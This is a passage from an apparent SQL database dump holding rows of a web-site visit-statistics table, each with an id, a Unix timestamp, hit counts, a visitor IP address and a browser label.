34','other'),(224505,1521791476,1,1,0,0,'91.196.178.40','chrome'),(224506,1521791769,1,1,0,0,'54.89.27.245','other'),(224507,1521791827,1,1,0,0,'54.36.148.230','other'),(224508,1521791837,1,1,0,0,'77.111.244.36','chrome'),(224509,1521791987,1,1,0,0,'54.36.149.62','other'),(224510,1521792038,2,2,0,0,'195.230.119.59','chrome'),(224511,1521792045,1,1,0,0,'216.244.66.237','other'),(224512,1521792059,3,3,0,0,'92.113.7.126','chrome'),(224513,1521792167,1,1,0,0,'54.36.148.186','other'),(224514,1521792402,1,1,0,0,'54.36.148.140','other'),(224515,1521792690,1,1,0,0,'54.89.27.245','other'),(224516,1521792838,1,1,0,0,'141.8.142.74','other'),(224517,1521792839,1,1,0,0,'54.36.148.176','other'),(224518,1521793059,2,2,0,0,'46.211.123.127','chrome'),(224519,1521793172,1,1,0,0,'54.36.149.32','other'),(224520,1521793323,2,2,0,0,'193.150.6.203','chrome'),(224521,1521793543,1,1,0,0,'54.36.148.107','other'),(224522,1521793597,2,2,0,0,'216.244.66.237','other'),(224523,1521793614,1,1,0,0,'54.89.27.245','other'),(224524,1521793664,2,2,0,0,'91.196.178.47','chrome'),(224525,1521793879,1,1,0,0,'193.16.101.106','chrome'),(224526,1521793901,1,1,0,0,'54.36.148.119','other'),(224527,1521793965,1,1,0,0,'54.36.149.13','other'),(224528,1521794328,1,1,0,0,'54.36.149.79','other'),(224529,1521794538,1,1,0,0,'54.89.27.245','other'),(224530,1521794804,1,1,0,0,'54.36.148.248','other'),(224531,1521794948,1,1,0,0,'54.36.148.65','other'),(224532,1521795137,1,1,0,0,'54.36.148.222','other'),(224533,1521795212,1,1,0,0,'54.36.148.150','other'),(224534,1521795357,1,1,0,0,'54.36.148.106','other'),(224535,1521795462,1,1,0,0,'54.89.27.245','other'),(224536,1521795521,1,1,0,0,'91.196.178.130','chrome'),(224537,1521795535,1,1,0,0,'54.36.148.94','other'),(224538,1521795662,1,1,0,0,'94.180.197.118','msie'),(224539,1521795806,1,1,0,0,'54.36.149.54','other'),(224540,1521796057,1,1,0,0,'54.36.149.9','other'),(224541,1521796378,1,1,0,0,'54.36.149.102','other'),(224542,1521796381,1,1,0,0,'54.89.27.245','other'),(224543,1521796412,1,1,0,0,'54.36.148.70','other'),(224544,1521796471,1,1,0,0,'91.196.178.44','chrome'),(224545,1521796502,1,1,0,0,'141.8.142.74','other'),(224546,1521796629,1,1,0,0,'46.42.145.3','msie'),(224547,1521796702,1,1,0,0,'54.36.148.250','other'),(224548,1521796958,1,1,0,0,'54.36.148.80','other'),(224549,1521797151,1,1,0,0,'128.72.151.219','msie'),(224550,1521797157,1,1,0,0,'54.36.148.164','other'),(224551,1521797191,1,1,0,0,'54.36.149.14','other'),(224552,1521797336,1,1,0,0,'54.89.27.245','other'),(224553,1521797364,1,1,0,0,'54.36.148.248','other'),(224554,1521797448,1,1,0,0,'54.36.148.129','other'),(224555,1521797617,1,1,0,0,'92.113.7.126','chrome'),(224556,1521797925,1,1,0,0,'91.196.178.161','firefox'),(224557,1521797938,1,1,0,0,'54.36.148.153','other'),(224558,1521798157,1,1,0,0,'54.36.148.40','other'),(224559,1521798254,1,1,0,0,'54.89.27.245','other'),(224560,1521798276,3,3,0,0,'216.244.66.237','other'),(224561,1521798331,1,1,0,0,'54.36.149.85','other'),(224562,1521798353,1,1,0,0,'94.180.144.21','msie'),(224563,1521798508,1,1,0,0,'91.196.178.74','chrome'),(224564,1521798564,1,1,0,0,'91.196.178.74','firefox'),(224565,1521798660,1,1,0,0,'91.196.177.178','chrome'),(224566,1521798776,1,1,0,0,'109.108.68.133','chrome'),(224567,1521798825,1,1,0,0,'176.36.50.232','chrome'),(224568,1521798831,1,1,0,0,'54.36.149.16','other'),(224569,1521798898,1,0,1,0,'66.249.69.144',''),(224570,1521798954,2,2,0,0,'91.196.177.156','chrome'),(224571,1521799156,1,1,0,0,'54.89.27.245','other'),(224572,1521799268,1,1,0,0,'77.37.220.207','msie'),(224573,1521799404,1,1,0,0,'141.8.142.74','other'),(224574,1521799594,1,1,0,0,'216.244.66.246','other'),(224575,1521799711,1,1,0,0,'216.244.66.237','other'),(224576,1521799792,1,1,0,0,'54.36.149.38','other'),(224577,1521799864,1,1,0,0,'46.200.41.170','chrome'),(224578,1521800003,2,2,0,0,'46.164.132.10','chrome'),(224579,1521800082,1,1,0,0,'54.89.27.245','other'),(224580,1521800093,1,1,0,0,'54.36.148.240','other'),(224581,1521800309,2,2,0,0,'130.180.218.221','chrome'),(224582,1521800325,1,1,0,0,'54.36.148.131','other'),(224583,1521800481,1,1,0,0,'54.36.148.127','other'),(224584,1521800531,1,1,0,0,'46.219.33.167','chrome'),(224585,1521800969,1,1,0,0,'91.196.178.38','chrome'),(224586,1521801006,1,1,0,0,'54.89.27.245','other'),(224587,1521801196,1,1,0,0,'37.73.219.147','chrome'),(224588,1521801616,1,1,0,0,'54.36.149.3','other'),(224589,1521801811,1,1,0,0,'54.36.149.78','other'),(224590,1521801849,2,2,0,0,'91.196.178.73','firefox'),(224591,1521801896,1,1,0,0,'54.36.148.30','other'),(224592,1521801898,1,1,0,0,'216.244.66.237','other'),(224593,1521801941,1,1,0,0,'54.89.27.245','other'),(224594,1521802152,1,1,0,0,'8.29.198.25','other'),(224595,1521802413,1,1,0,0,'54.36.148.25','other'),(224596,1521802505,1,1,0,0,'91.196.178.74','chrome'),(224597,1521802512,1,1,0,0,'91.196.178.97','chrome'),(224598,1521802626,1,1,0,0,'54.36.148.186','other'),(224599,1521802839,1,1,0,0,'37.73.240.222','chrome'),(224600,1521802854,1,1,0,0,'54.89.27.245','other'),(224601,1521803344,1,1,0,0,'91.124.182.170','firefox'),(224602,1521803347,1,1,0,0,'54.36.149.99','other'),(224603,1521803404,1,1,0,0,'176.122.100.15','chrome'),(224604,1521803784,1,1,0,0,'54.89.27.245','other'),(224605,1521804111,1,1,0,0,'91.196.178.35','chrome'),(224606,1521804361,1,1,0,0,'91.124.182.170','firefox'),(224607,1521804633,1,1,0,0,'216.244.66.237','other'),(224608,1521804707,1,1,0,0,'54.89.27.245','other'),(224610,1521804756,1,1,0,0,'54.36.149.78','other'),(224611,1521804766,5,5,0,0,'91.196.178.77','chrome'),(224612,1521805085,1,1,0,0,'54.67.59.131','chrome'),(224613,1521805172,1,1,0,0,'94.180.160.150','msie'),(224614,1521805328,1,1,0,0,'91.124.182.170','firefox'),(224615,1521805375,1,1,0,0,'54.36.149.90','other'),(224616,1521805387,1,1,0,0,'199.59.150.181','other'),(224617,1521805422,2,2,0,0,'91.196.178.165','chrome'),(224618,1521805423,1,1,0,0,'95.134.97.244','chrome'),(224619,1521805602,1,1,0,0,'178.154.171.88','other'),(224620,1521805627,2,2,0,0,'77.111.244.68','chrome'),(224621,1521805628,1,1,0,0,'54.89.27.245','other'),(224622,1521805690,4,4,0,0,'91.196.178.77','chrome'),(224623,1521805826,1,1,0,0,'91.196.178.97','chrome'),(224624,1521805894,1,1,0,0,'54.36.148.13','other'),(224625,1521806105,2,2,0,0,'216.244.66.237','other'),(224626,1521806173,1,1,0,0,'128.72.238.165','msie'),(224627,1521806311,1,1,0,0,'54.36.148.175','other'),(224628,1521806315,1,1,0,0,'54.36.149.99','other'),(224629,1521806351,1,1,0,0,'54.36.148.140','other'),(224630,1521806372,1,1,0,0,'54.36.149.105','other'),(224631,1521806383,1,1,0,0,'91.196.178.79','chrome'),(224632,1521806394,2,2,0,0,'141.8.142.74','other'),(224633,1521806482,1,1,0,0,'37.73.232.208','chrome'),(224634,1521806506,1,1,0,0,'91.196.177.137','firefox'),(224635,1521806534,1,1,0,0,'54.89.27.245','other'),(224636,1521806592,2,2,0,0,'91.196.178.35','chrome'),(224637,1521806707,1,1,0,0,'54.36.149.83','other'),(224638,1521806798,1,1,0,0,'46.42.165.101','msie'),(224639,1521806928,1,1,0,0,'54.36.148.89','other'),(224640,1521807189,1,1,0,0,'107.167.109.99','other'),(224641,1521807418,1,1,0,0,'77.111.244.33','chrome'),(224642,1521807459,1,1,0,0,'54.89.27.245','other'),(224643,1521807500,2,2,0,0,'62.205.134.182','msie'),(224644,1521807559,1,1,0,0,'107.167.109.4','other'),(224645,1521807898,1,1,0,0,'54.36.149.96','other'),(224646,1521807910,2,2,0,0,'216.244.66.237','other'),(224647,1521807928,1,1,0,0,'54.36.148.47','other'),(224648,1521808022,2,2,0,0,'91.196.177.46','chrome'),(224649,1521808043,1,1,0,0,'94.180.144.21','msie'),(224650,1521808252,1,1,0,0,'54.36.149.84','other'),(224651,1521808271,1,1,0,0,'77.37.220.207','msie'),(224652,1521808378,1,1,0,0,'54.89.27.245','other'),(224653,1521808414,1,1,0,0,'193.19.152.77','chrome'),(224654,1521808556,2,2,0,0,'213.179.252.111','chrome'),(224655,1521808636,1,1,0,0,'91.203.26.166','chrome'),(224656,1521808839,1,1,0,0,'207.46.13.209','other'),(224657,1521809005,1,0,1,0,'66.249.69.143',''),(224658,1521809072,1,1,0,0,'185.26.183.65','chrome'),(224659,1521809269,1,1,0,0,'80.240.128.221','chrome'),(224660,1521809296,1,1,0,0,'54.89.27.245','other'),(224661,1521809416,1,1,0,0,'54.36.148.138','other'),(224662,1521809524,1,1,0,0,'216.244.66.237','other'),(224663,1521809827,1,1,0,0,'77.111.244.31','chrome'),(224664,1521809834,1,1,0,0,'95.134.97.244','chrome'),(224665,1521809890,1,1,0,0,'54.36.149.37','other'),(224666,1521809971,2,2,0,0,'213.179.252.111','chrome'),(224667,1521810128,1,1,0,0,'54.36.148.44','other'),(224668,1521810183,2,2,0,0,'62.205.134.182','firefox'),(224669,1521810198,1,1,0,0,'54.89.27.245','other'),(224670,1521810249,1,1,0,0,'141.8.142.74','other'),(224671,1521810281,1,1,0,0,'91.196.178.83','chrome'),(224672,1521810487,1,1,0,0,'54.36.148.244','other'),(224673,1521810564,1,1,0,0,'54.36.149.27','other'),(224674,1521810753,1,1,0,0,'54.36.148.23','other'),(224675,1521810845,1,1,0,0,'46.211.105.250','other'),(224676,1521810876,1,1,0,0,'54.36.148.223','other'),(224677,1521810978,1,1,0,0,'54.36.148.219','other'),(224678,1521810981,1,1,0,0,'54.36.148.16','other'),(224679,1521810997,1,1,0,0,'216.244.66.237','other'),(224680,1521811120,1,1,0,0,'54.89.27.245','other'),(224681,1521811505,1,1,0,0,'54.36.149.96','other'),(224682,1521811639,2,2,0,0,'62.205.134.182','msie'),(224683,1521811672,1,1,0,0,'64.120.56.210','other'),(224684,1521811748,1,1,0,0,'54.36.148.118','other'),(224685,1521811770,1,1,0,0,'37.73.210.210','chrome'),(224686,1521811927,1,1,0,0,'54.36.148.228','other'),(224687,1521812038,1,1,0,0,'54.36.149.11','other'),(224688,1521812041,1,1,0,0,'54.89.27.245','other'),(224689,1521812051,2,2,0,0,'130.180.218.19','chrome'),(224690,1521812081,1,1,0,0,'54.36.148.186','other'),(224691,1521812243,1,1,0,0,'91.196.177.137','firefox'),(224692,1521812336,1,1,0,0,'159.224.216.19','other'),(224693,1521812617,1,1,0,0,'54.36.148.95','other'),(224694,1521812837,1,1,0,0,'54.36.149.28','other'),(224695,1521812947,1,1,0,0,'54.36.148.180','other'),(224696,1521812961,1,1,0,0,'54.89.27.245','other'),(224697,1521813013,1,1,0,0,'8.29.198.25','other'),(224698,1521813056,1,1,0,0,'54.36.148.60','other'),(224699,1521813228,2,2,0,0,'178.154.171.88','other'),(224700,1521813229,1,1,0,0,'54.36.149.62','other'),(224701,1521813370,1,1,0,0,'54.36.148.240','other'),(224702,1521813406,1,1,0,0,'188.166.26.63','chrome'),(224703,1521813411,1,1,0,0,'128.199.41.16','chrome'),(224704,1521813425,1,1,0,0,'62.205.134.182','msie'),(224705,1521813478,1,1,0,0,'54.36.149.6','other'),(224706,1521813716,1,1,0,0,'107.167.108.28','other'),(224707,1521813774,1,1,0,0,'54.36.148.88','other'),(224708,1521813824,1,1,0,0,'216.244.66.237','other'),(224709,1521813864,1,1,0,0,'54.89.27.245','other'),(224710,1521814054,14,14,0,0,'213.179.252.111','chrome'),(224711,1521814135,1,1,0,0,'107.167.108.86','other'),(224712,1521814381,1,1,0,0,'92.112.125.243','chrome'),(224713,1521814572,1,1,0,0,'31.13.114.210','other'),(224714,1521814575,1,1,0,0,'31.13.106.118','other'),(224715,1521814577,1,1,0,0,'31.13.114.55','other'),(224716,1521814578,1,1,0,0,'31.13.114.215','other'),(224717,1521814599,1,1,0,0,'95.134.97.244','chrome'),(224718,1521814615,1,1,0,0,'66.220.156.23','other'),(224719,1521814786,1,1,0,0,'54.89.27.245','other'),(224720,1521814849,2,2,0,0,'141.8.142.74','other'),(224721,1521814920,1,1,0,0,'107.167.105.103','other'),(224722,1521814965,3,3,0,0,'91.196.178.134','chrome'),(224723,1521814987,1,1,0,0,'178.154.171.88','other'),(224724,1521815085,3,3,0,0,'213.179.252.111','chrome'),(224725,1521815096,1,1,0,0,'54.36.148.145','other'),(224726,1521815151,1,1,0,0,'54.36.148.156','other'),(224727,1521815249,2,2,0,0,'62.205.134.182','msie'),(224728,1521815628,1,1,0,0,'54.36.148.34','other'),(224729,1521815699,1,1,0,0,'54.36.148.121','other'),(224730,1521815708,1,1,0,0,'54.89.27.245','other'),(224731,1521815733,1,1,0,0,'216.244.66.237','other'),(224732,1521815823,1,1,0,0,'37.54.182.136','chrome'),(224733,1521815866,1,1,0,0,'54.36.148.134','other'),(224734,1521815886,1,1,0,0,'188.32.190.177','msie'),(224735,1521815895,1,1,0,0,'54.36.148.54','other'),(224736,1521815916,1,1,0,0,'128.199.41.16','chrome'),(224737,1521816003,1,1,0,0,'54.36.149.17','other'),(224738,1521816016,1,1,0,0,'54.36.149.85','other'),(224739,1521816072,1,1,0,0,'37.146.115.167','msie'),(224740,1521816161,1,1,0,0,'54.36.148.92','other'),(224741,1521816187,1,1,0,0,'54.36.149.30','other'),(224742,1521816275,1,1,0,0,'157.55.39.19','other'),(224743,1521816327,1,1,0,0,'54.36.148.250','other'),(224744,1521816396,1,1,0,0,'216.244.66.194','other'),(224745,1521816561,2,2,0,0,'213.179.252.111','chrome'),(224746,1521816624,1,1,0,0,'54.89.27.245','other'),(224747,1521816708,1,1,0,0,'54.36.149.88','other'),(224748,1521816782,1,1,0,0,'46.211.104.202','chrome'),(224749,1521816826,12,12,0,0,'91.196.178.22','chrome'),(224750,1521816833,1,1,0,0,'91.196.178.104','firefox'),(224751,1521817016,1,1,0,0,'54.36.148.146','other'),(224752,1521817115,1,1,0,0,'91.196.178.102','chrome'),(224753,1521817176,1,1,0,0,'54.36.148.19','other'),(224754,1521817181,1,1,0,0,'54.36.148.108','other'),(224755,1521817399,1,1,0,0,'54.36.148.143','other'),(224756,1521817480,1,1,0,0,'54.36.148.17','other'),(224757,1521817497,1,1,0,0,'95.27.2.161','msie'),(224758,1521817713,1,1,0,0,'54.89.27.245','other'),(224759,1521817726,1,1,0,0,'95.132.14.9','chrome'),(224760,1521817840,1,1,0,0,'92.112.125.243','chrome'),(224761,1521817950,1,1,0,0,'54.36.148.212','other'),(224762,1521818220,2,2,0,0,'213.179.252.111','chrome'),(224763,1521818280,1,1,0,0,'54.36.149.61','other'),(224764,1521818350,1,1,0,0,'188.255.51.195','msie'),(224765,1521818391,1,1,0,0,'178.154.171.88','other'),(224766,1521818405,1,1,0,0,'37.204.191.25','msie'),(224767,1521818414,1,1,0,0,'54.36.148.53','other'),(224768,1521818430,1,1,0,0,'193.84.77.238','chrome'),(224769,1521818637,1,1,0,0,'54.89.27.245','other'),(224770,1521818713,1,1,0,0,'54.36.149.85','other'),(224771,1521818945,1,1,0,0,'62.205.134.182','msie'),(224772,1521819125,1,1,0,0,'54.36.148.116','other'),(224773,1521819395,1,1,0,0,'37.9.113.182','other'),(224774,1521819470,1,1,0,0,'91.196.178.78','firefox'),(224775,1521819555,1,1,0,0,'54.89.27.245','other'),(224776,1521820272,1,1,0,0,'62.205.134.182','msie'),(224777,1521820292,1,1,0,0,'141.8.142.74','other'),(224778,1521820479,1,1,0,0,'54.89.27.245','other'),(224779,1521820524,1,1,0,0,'54.36.148.139','other'),(224780,1521820771,1,1,0,0,'54.36.148.48','other'),(224781,1521820941,1,1,0,0,'54.36.148.78','other'),(224782,1521820947,1,1,0,0,'95.132.31.131','firefox'),(224783,1521820966,1,1,0,0,'54.36.149.43','other'),(224784,1521821168,3,3,0,0,'54.165.59.7','other'),(224785,1521821313,1,1,0,0,'54.36.148.55','other'),(224786,1521821410,1,1,0,0,'54.89.27.245','other'),(224787,1521821431,1,1,0,0,'54.36.149.58','other'),(224788,1521821438,4,4,0,0,'91.196.178.35','chrome'),(224789,1521822098,1,1,0,0,'54.36.148.93','other'),(224790,1521822215,1,1,0,0,'91.196.178.12','chrome'),(224791,1521822314,1,1,0,0,'54.89.27.245','other'),(224792,1521823042,1,1,0,0,'188.230.43.254','other'),(224793,1521823149,1,1,0,0,'95.208.248.158','chrome'),(224794,1521823222,1,1,0,0,'54.89.27.245','other'),(224795,1521823235,1,1,0,0,'54.36.148.10','other'),(224796,1521823593,1,1,0,0,'37.73.198.222','chrome'),(224797,1521823704,1,1,0,0,'54.36.148.65','other'),(224798,1521823724,2,2,0,0,'141.8.142.74','other'),(224799,1521823743,1,1,0,0,'54.36.148.91','other'),(224800,1521823860,1,1,0,0,'8.29.198.27','other'),(224801,1521823910,1,1,0,0,'54.36.148.231','other'),(224802,1521824048,1,1,0,0,'54.36.148.66','other'),(224803,1521824063,1,1,0,0,'54.36.148.203','other'),(224804,1521824084,1,1,0,0,'54.36.148.166','other'),(224805,1521824139,1,1,0,0,'54.89.27.245','other'),(224806,1521824424,1,1,0,0,'35.226.23.240','other'),(224807,1521824492,1,1,0,0,'54.36.148.84','other'),(224808,1521824732,1,1,0,0,'54.36.148.244','other'),(224809,1521824757,1,1,0,0,'54.36.148.151','other'),(224810,1521824863,2,2,0,0,'213.179.252.111','chrome'),(224811,1521824967,1,0,1,0,'66.249.69.144',''),(224812,1521825040,1,1,0,0,'54.89.27.245','other'),(224813,1521825441,1,1,0,0,'188.230.43.254','other'),(224814,1521825669,1,1,0,0,'54.36.149.54','other'),(224815,1521825961,1,1,0,0,'54.89.27.245','other'),(224816,1521825991,1,1,0,0,'54.36.148.79','other'),(224817,1521826113,1,1,0,0,'54.36.149.87','other'),(224818,1521826233,1,0,1,0,'66.249.75.153',''),(224819,1521826429,1,1,0,0,'54.36.149.9','other'),(224820,1521826534,1,1,0,0,'54.36.148.77','other'),(224821,1521826569,3,3,0,0,'213.179.252.111','chrome'),(224822,1521826785,1,1,0,0,'94.180.160.150','msie'),(224823,1521826937,1,1,0,0,'54.36.148.67','other'),(224824,1521826953,1,1,0,0,'54.36.148.93','other'),(224825,1521827056,1,1,0,0,'91.209.11.236','other'),(224826,1521827221,1,1,0,0,'95.27.2.161','msie'),(224827,1521827236,1,1,0,0,'91.196.178.130','chrome'),(224828,1521827811,1,1,0,0,'180.76.15.9','other'),(224829,1521827841,1,1,0,0,'188.230.43.254','other'),(224830,1521827846,1,1,0,0,'54.36.148.195','other'),(224831,1521827923,2,2,0,0,'213.179.252.111','chrome'),(224832,1521828305,1,1,0,0,'54.36.149.52','other'),(224833,1521828503,1,1,0,0,'77.37.220.207','msie'),(224834,1521828858,1,1,0,0,'188.255.51.195','msie'),(224835,1521829137,1,1,0,0,'54.36.148.163','other'),(224836,1521829143,1,1,0,0,'91.196.178.130','firefox'),(224837,1521829847,1,1,0,0,'54.36.148.125','other'),(224838,1521829851,1,1,0,0,'141.8.142.74','other'),(224839,1521829862,1,1,0,0,'207.46.13.34','other'),(224840,1521829875,1,1,0,0,'54.36.148.75','other'),(224841,1521829935,1,1,0,0,'54.36.148.70','other'),(224842,1521829971,1,1,0,0,'54.36.148.45','other'),(224843,1521830152,1,1,0,0,'54.36.148.168','other'),(224844,1521830239,1,1,0,0,'188.230.43.254','other'),(224845,1521830576,1,1,0,0,'54.36.149.29','other'),(224846,1521830868,3,3,0,0,'54.89.27.245','other'),(224847,1521831070,1,1,0,0,'87.250.224.46','other'),(224848,1521831469,1,1,0,0,'54.36.149.43','other'),(224849,1521831476,1,1,0,0,'107.167.106.118','other'),(224850,1521831796,1,1,0,0,'54.89.27.245','other'),(224851,1521831935,2,2,0,0,'91.196.178.166','chrome'),(224852,1521831939,1,1,0,0,'207.46.13.34','other'),(224853,1521832091,1,1,0,0,'54.36.148.41','other'),(224854,1521832154,2,2,0,0,'91.232.158.75','other'),(224855,1521832462,1,1,0,0,'54.36.148.181','other'),(224856,1521832715,1,1,0,0,'54.89.27.245','other'),(224857,1521832944,1,1,0,0,'54.36.148.201','other'),(224858,1521833024,1,1,0,0,'54.36.148.182','other'),(224859,1521833113,1,1,0,0,'91.196.178.166','chrome'),(224860,1521833228,1,1,0,0,'54.36.148.128','other'),(224861,1521833279,1,1,0,0,'54.36.148.160','other'),(224862,1521833333,1,1,0,0,'54.36.148.88','other'),(224863,1521833365,3,3,0,0,'141.8.142.74','other'),(224864,1521833402,1,1,0,0,'178.154.171.88','other'),(224865,1521833575,1,1,0,0,'54.36.148.53','other'),(224866,1521833596,2,2,0,0,'54.36.148.75','other'),(224867,1521833625,1,1,0,0,'54.89.27.245','other'),(224868,1521833666,1,1,0,0,'54.36.148.178','other'),(224869,1521833988,3,3,0,0,'91.196.178.99','chrome'),(224870,1521834380,1,1,0,0,'54.36.148.207','other'),(224871,1521834544,1,1,0,0,'54.89.27.245','other'),(224872,1521834579,1,1,0,0,'130.180.208.190','chrome'),(224873,1521834697,1,1,0,0,'8.29.198.25','other'),(224874,1521834731,1,1,0,0,'54.36.148.64','other'),(224875,1521834742,3,3,0,0,'91.196.178.136','chrome'),(224876,1521834808,1,1,0,0,'54.36.148.103','other'),(224877,1521835227,1,1,0,0,'80.252.155.198','chrome'),(224878,1521835386,3,3,0,0,'213.179.252.111','chrome'),(224879,1521835469,1,1,0,0,'54.89.27.245','other'),(224880,1521835513,1,1,0,0,'54.36.148.186','other'),(224881,1521835553,2,2,0,0,'37.54.114.62','chrome'),(224882,1521835556,1,1,0,0,'54.36.149.3','other'),(224883,1521835607,1,1,0,0,'54.36.148.36','other'),(224884,1521836050,1,1,0,0,'91.196.178.166','chrome'),(224885,1521836066,1,1,0,0,'54.36.148.15','other'),(224886,1521836308,1,1,0,0,'54.36.148.204','other'),(224887,1521836386,1,1,0,0,'54.89.27.245','other'),(224888,1521836868,1,1,0,0,'216.244.66.237','other'),(224889,1521837203,10,10,0,0,'69.58.178.59','other'),(224890,1521837308,1,1,0,0,'54.89.27.245','other'),(224891,1521837810,1,1,0,0,'54.36.149.55','other'),(224892,1521837844,2,2,0,0,'95.132.51.183','chrome'),(224893,1521838028,1,1,0,0,'91.196.178.162','other'),(224894,1521838226,1,1,0,0,'54.89.27.245','other'),(224895,1521838284,1,1,0,0,'93.75.8.57','other'),(224896,1521838311,1,1,0,0,'54.36.148.170','other'),(224897,1521838394,1,1,0,0,'54.36.148.175','other'),(224898,1521838884,1,1,0,0,'185.103.254.226','firefox'),(224899,1521839015,1,1,0,0,'54.36.148.112','other'),(224900,1521839136,1,1,0,0,'54.89.27.245','other'),(224901,1521839192,1,1,0,0,'54.36.149.96','other'),(224902,1521839363,2,2,0,0,'37.9.113.182','other'),(224903,1521839366,1,1,0,0,'87.250.224.46','other'),(224904,1521839369,1,1,0,0,'141.8.132.19','other'),(224905,1521839571,1,1,0,0,'54.36.148.227','other'),(224906,1521839755,1,1,0,0,'54.36.149.34','other'),(224907,1521839896,2,2,0,0,'141.8.142.74','other'),(224908,1521839977,1,1,0,0,'216.244.66.237','other'),(224909,1521840062,1,1,0,0,'54.89.27.245','other'),(224910,1521840480,1,1,0,0,'54.36.148.85','other'),(224911,1521840620,1,1,0,0,'54.36.149.17','other'),(224912,1521840784,1,1,0,0,'46.133.244.83','chrome'),(224913,1521840928,1,1,0,0,'37.73.200.34','chrome'),(224914,1521840984,1,1,0,0,'54.89.27.245','other'),(224915,1521841457,3,3,0,0,'91.196.178.1','chrome'),(224916,1521841517,2,2,0,0,'46.211.155.138','chrome'),(224917,1521841707,1,1,0,0,'54.36.148.53','other'),(224918,1521841802,1,1,0,0,'54.36.148.228','other'),(224919,1521841823,1,1,0,0,'54.36.149.89','other'),(224920,1521841913,1,1,0,0,'54.89.27.245','other'),(224921,1521842001,1,1,0,0,'54.36.149.13','other'),(224922,1521842004,1,1,0,0,'91.196.178.34','other'),(224923,1521842683,1,1,0,0,'37.190.163.241','chrome'),(224924,1521842820,1,1,0,0,'54.89.27.245','other'),(224925,1521842876,1,1,0,0,'87.250.224.46','other'),(224926,1521843060,1,1,0,0,'52.87.30.80','other'),(224927,1521843112,1,1,0,0,'54.36.149.56','other'),(224928,1521843736,1,1,0,0,'54.89.27.245','other'),(224929,1521843904,1,1,0,0,'54.36.148.195','other'),(224930,1521843932,1,1,0,0,'54.36.149.79','other'),(224931,1521843972,1,1,0,0,'52.87.30.80','other'),(224932,1521844119,1,1,0,0,'54.36.148.69','other'),(224933,1521844266,5,5,0,0,'5.9.156.74','other'),(224934,1521844277,1,1,0,0,'54.36.149.103','other'),(224935,1521844339,1,1,0,0,'54.36.148.88','other'),(224936,1521844369,1,1,0,0,'54.36.148.60','other'),(224937,1521844651,1,1,0,0,'54.89.27.245','other'),(224938,1521844789,1,1,0,0,'66.249.75.153','chrome'),(224939,1521844903,1,1,0,0,'52.87.30.80','other'),(224940,1521844995,1,1,0,0,'54.36.149.94','other'),(224941,1521845330,1,1,0,0,'141.8.142.74','other'),(224942,1521845505,1,1,0,0,'54.36.148.102','other'),(224943,1521845541,1,1,0,0,'8.29.198.25','other'),(224944,1521845574,1,1,0,0,'54.89.27.245','other'),(224945,1521845750,1,0,1,0,'66.249.69.143',''),(224946,1521845771,1,1,0,0,'54.36.148.45','other'),(224947,1521845822,1,1,0,0,'52.87.30.80','other'),(224948,1521846310,1,1,0,0,'54.36.148.214','other'),(224949,1521846361,1,1,0,0,'54.36.148.68','other'),(224950,1521846476,1,1,0,0,'54.89.27.245','other'),(224951,1521846586,1,1,0,0,'66.249.69.143','chrome'),(224952,1521846601,1,1,0,0,'141.8.142.74','other'),(224953,1521846654,1,0,1,0,'66.249.75.153',''),(224954,1521846757,1,1,0,0,'52.87.30.80','other'),(224955,1521847077,1,1,0,0,'54.36.149.29','other'),(224956,1521847186,1,1,0,0,'54.36.148.169','other'),(224957,1521847215,1,1,0,0,'54.36.148.69','other'),(224958,1521847418,1,1,0,0,'54.89.27.245','other'),(224959,1521847643,1,1,0,0,'54.36.148.36','other'),(224960,1521847689,1,1,0,0,'52.87.30.80','other'),(224961,1521847869,1,1,0,0,'54.36.148.23','other'),(224962,1521847891,1,1,0,0,'54.36.148.16','other'),(224963,1521847969,1,1,0,0,'54.36.148.222','other'),(224964,1521848185,1,1,0,0,'54.36.148.70','other'),(224965,1521848187,1,1,0,0,'54.36.148.232','other'),(224966,1521848330,1,1,0,0,'141.8.142.74','other'),(224967,1521848342,1,1,0,0,'54.36.148.187','other'),(224968,1521848347,1,1,0,0,'54.36.149.31','other'),(224969,1521848349,1,1,0,0,'54.89.27.245','other'),(224970,1521848590,1,1,0,0,'54.36.148.37','other'),(224971,1521848592,1,1,0,0,'52.87.30.80','other'),(224972,1521848754,1,1,0,0,'54.36.148.74','other'),(224973,1521848810,2,0,2,0,'66.249.69.143',''),(224974,1521848982,1,1,0,0,'54.36.148.44','other'),(224975,1521848986,1,1,0,0,'54.36.148.32','other'),(224976,1521848999,1,1,0,0,'54.36.148.116','other'),(224977,1521849269,1,1,0,0,'54.89.27.245','other'),(224978,1521849560,1,1,0,0,'52.87.30.80','other'),(224979,1521849834,1,1,0,0,'54.36.148.157','other'),(224980,1521849933,1,1,0,0,'54.36.148.98','other'),(224981,1521850017,1,1,0,0,'54.36.149.107','other'),(224982,1521850256,1,1,0,0,'54.89.27.245','other'),(224983,1521850462,1,1,0,0,'52.87.30.80','other'),(224984,1521850801,1,1,0,0,'54.36.149.9','other'),(224985,1521850887,1,1,0,0,'54.36.148.219','other'),(224986,1521851235,1,1,0,0,'54.36.148.247','other'),(224987,1521851419,1,1,0,0,'52.87.30.80','other'),(224988,1521851489,1,1,0,0,'54.89.27.245','other'),(224989,1521851688,1,1,0,0,'54.36.148.254','other'),(224990,1521851771,1,1,0,0,'54.36.148.227','other'),(224991,1521852346,1,1,0,0,'52.87.30.80','other'),(224992,1521852431,2,2,0,0,'216.244.66.237','other'),(224993,1521853065,1,1,0,0,'54.89.27.245','other'),(224994,1521853280,1,1,0,0,'54.36.149.39','other'),(224995,1521853316,1,1,0,0,'52.87.30.80','other'),(224996,1521853351,1,1,0,0,'216.244.66.237','other'),(224997,1521853399,1,1,0,0,'54.36.148.70','other'),(224998,1521853515,1,0,1,0,'66.249.69.145',''),(224999,1521853904,1,1,0,0,'54.36.148.214','other'),(225000,1521853930,1,1,0,0,'54.36.149.51','other'),(225001,1521853937,1,1,0,0,'54.36.148.236','other'),(225002,1521854030,1,1,0,0,'54.36.149.42','other'),(225003,1521854240,1,1,0,0,'52.87.30.80','other'),(225004,1521854551,1,1,0,0,'54.89.27.245','other'),(225005,1521854552,1,1,0,0,'54.36.148.115','other'),(225006,1521854682,1,1,0,0,'54.36.148.128','other'),(225007,1521854882,1,1,0,0,'54.36.148.72','other'),(225008,1521854917,1,1,0,0,'54.36.148.140','other'),(225009,1521855090,1,1,0,0,'54.36.149.20','other'),(225010,1521855145,1,1,0,0,'52.87.30.80','other'),(225011,1521855162,1,1,0,0,'54.36.149.24','other'),(225012,1521855482,1,1,0,0,'157.55.39.19','other'),(225013,1521855563,1,1,0,0,'54.36.148.177','other'),(225014,1521855703,1,0,1,0,'66.249.69.143',''),(225015,152185